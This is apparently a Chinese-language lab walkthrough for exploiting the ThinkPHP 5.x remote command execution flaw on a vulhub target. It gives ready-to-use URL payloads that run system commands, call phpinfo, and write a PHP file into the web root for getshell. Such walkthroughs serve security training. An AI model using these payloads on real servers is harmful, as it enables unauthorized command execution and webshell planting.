当前位置: 首页 > article >正文

Thinkphp(TP)漏洞攻略

Thinkphp5x远程命令执⾏及getshell

靶场:vulhub/thinkphp/5-rce

1,启动环境后进行访问

2,我们可以直接使用工具来操作

也可以使用远程命令/远程代码来执行

远程命令执行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami

远程代码执行

? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1

3,getshell

在输入框中输入以下内容在根目录生成1.php文件,输出phpinfo

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "" >>1.php


http://www.kler.cn/a/600925.html

相关文章:

  • 跑得快ai
  • Redis 版本演进及主要新特性
  • [项目]基于FreeRTOS的STM32四轴飞行器: 十二.角速度加速度滤波
  • VLAN综合实验实验报告
  • 保安员证报考要求有哪些,备考题库资料分享
  • Windows系统添加路由
  • 数字乡村综合管理与服务平台软件需求规格说明文档
  • 大模型应用开发之大模型工作流程
  • 【深入理解 SpringBoot3】第一弹:SpringBoot3 快速入门
  • 基于@Scheduled注解(静态配置)实现定时任务
  • 【2025】基于springboot+vue的医院在线问诊系统设计与实现(源码、万字文档、图文修改、调试答疑)
  • Spring MVC 请求与响应
  • WebAssembly实践,性能也有局限性
  • 【TCP/IP、HTTP等网络协议】
  • Kubernetes高级应用之-重启策略
  • 【愚公系列】《高效使用DeepSeek》032-育儿知识获取
  • 记录一次部署k3s后,服务404 page not found,nginx显示正常
  • [数据结构]1.时间复杂度和空间复杂度
  • Win10批处理脚本操作注册表教程
  • Android Wrapper Gradle 下载问题:Could not install Gradle distribution from...